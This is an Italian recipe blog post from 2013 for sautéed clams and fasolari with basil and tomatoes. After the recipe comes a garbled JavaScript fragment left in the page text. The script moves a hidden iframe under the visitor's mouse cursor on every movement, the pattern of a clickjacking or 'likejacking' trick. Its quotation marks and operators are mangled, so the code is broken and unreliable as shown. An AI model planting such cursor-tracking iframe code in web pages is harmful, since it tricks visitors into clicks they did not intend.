mercoledì 9 ottobre 2013

Saute' di vongole e fasolari al basilico

INGREDIENTI PER 4 PERSONE:1kg di vongole,12 fasolari,200 gr di pomodori maturi,4 cucchiai di olio extravergine di oliva,0,5 dl di vino bianco secco,1 cipollotto,2 rametti di basilico,1 ciuffo di prezzemolo,1 cucchiaino di salsa worcester,4 fette di pane casareccio tostato, sale grosso.PREPARAZIONE:Lavate le vongole e i fasolari sotto l acqua corrente ,trasferiteli in una ampia ciotola non metallica ,copriteli con abbondante acqua fredda ,aggiungete un paio di manciate di sale grosse e mescolate.Lasciate riposare per almeno 1 ora.Scolate le vongole e i fasolari con un mestolo forato e trasferiteli in un colino a sgocciolare.Pulire il cipollotto ,tagliatelo a rondelle e soffriggetelo in una larga padella con l olio.Unite il prezzemolo e il vino e lasciate sobbolire per qualche min,finche' il liquido si sara' ridotto a circa meta'.Nel frattempo,lavate,asciugate e tagliate a spicchi i pomodori.Lavate ,asciugate e spezzettate le foglie di basilico.Versate la salsa worcester nella padella ,unite i molluschi,mescolate ,e coprite e lasciate cuocere a fiamma vivace finche' le conchiglie si saranno aperte.Suddividete in 4 piati i molluschi con il loro fondo di cottura ,unite gli spicchi di pomodoro e il basilico.Accompagnate con le fette di pane tostato e servite ecco fatto il piatto e' pronto!!
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>